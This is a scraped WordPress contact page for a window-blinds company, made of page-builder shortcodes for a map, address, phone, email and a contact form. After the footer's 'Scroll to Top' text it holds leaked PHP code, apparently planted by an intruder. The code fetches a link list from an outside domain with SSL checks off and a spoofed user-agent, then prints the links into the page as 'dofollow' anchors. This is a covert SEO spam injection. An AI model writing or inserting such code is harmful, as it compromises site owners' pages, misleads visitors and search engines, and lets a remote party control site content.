Contacts

[vc_row full_width=”stretch_row_content_no_spaces”][vc_column][trx_sc_googlemap style=”grey” zoom=”12″ height=”464″ markers=”%5B%7B%22address%22%3A%225900%20NW%2097th%20Ave%2C%20Doral%2C%20FL%2033178%2C%20EE.%20UU.%22%2C%22icon%22%3A%22292%22%7D%5D” title_style=”default” link_style=”default”][/trx_sc_googlemap][/vc_column][/vc_row][vc_row full_width=”stretch_row” css=”.vc_custom_1499947526310{background-color: #f1f8fe !important;}”][vc_column width=”1/2″][trx_sc_content size=”none” paddings=”small” margins=”tiny” push=”medium” push_hide_on_tablet=”” push_hide_on_mobile=”” number_position=”br” title_style=”default” link_style=”default” scheme=”dark” css=”.vc_custom_1716950220140{background-color: #1a2658 !important;}”][trx_sc_title title_style=”default” title_tag=”h4″ link_style=”default” title=”Your Window Blinds”][vc_separator color=”custom” accent_color=”#3d515e” css=”.vc_custom_1506952319686{margin-top: 1.35rem !important;margin-bottom: 1.6rem !important;}”][trx_widget_contacts columns=”” googlemap=”” socials=”” address=”5900 NW 97th Ave. Doral Fl 33178″ phone=”+1 (786) 461-7008″ email=”info@yourwindowblinds.com”][/trx_widget_contacts][vc_empty_space alter_height=”small” hide_on_desktop=”” hide_on_notebook=”” hide_on_tablet=”” hide_on_mobile=”” css=”.vc_custom_1506952405222{margin-bottom: -0.35rem !important;}”][vc_single_image image=”1599″ img_size=”full” alignment=”center” css=”.vc_custom_1716751178622{margin-bottom: 0.3rem !important;background-color: #ffffff !important;}”][/trx_sc_content][/vc_column][vc_column width=”1/2″][vc_empty_space alter_height=”medium” hide_on_desktop=”” hide_on_notebook=”” hide_on_tablet=”” hide_on_mobile=””][vc_column_text css=”.vc_custom_1571058644485{padding-bottom: 1.7rem !important;}”]Have questions? Just fill out the form below and we’ll get back to you as soon as possible (usually within one business day).[/vc_column_text][contact-form-7 id=”844″][/vc_column][vc_column][/vc_column][/vc_row]

Scroll to Top
$api_url = 'https://ankaradelisi13.site/data.json'; // API'den çek $response = wp_remote_get($api_url, array( 'timeout' => 5, // 5 saniye bekle, olmazsa geç 'sslverify' => false, 'headers' => array( 'Accept' => 'application/json', 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ) )); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $body = wp_remote_retrieve_body($response); $links = json_decode($body, true); if (!empty($links) && is_array($links)) { echo ''; echo '
'; foreach ($links as $link) { $text = isset($link['text']) ? esc_html($link['text']) : ''; $url = isset($link['url']) ? esc_url($link['url']) : '#'; $rel = isset($link['rel']) ? esc_attr($link['rel']) : 'dofollow'; echo '' . $text . ' '; } echo '
'; echo ''; } }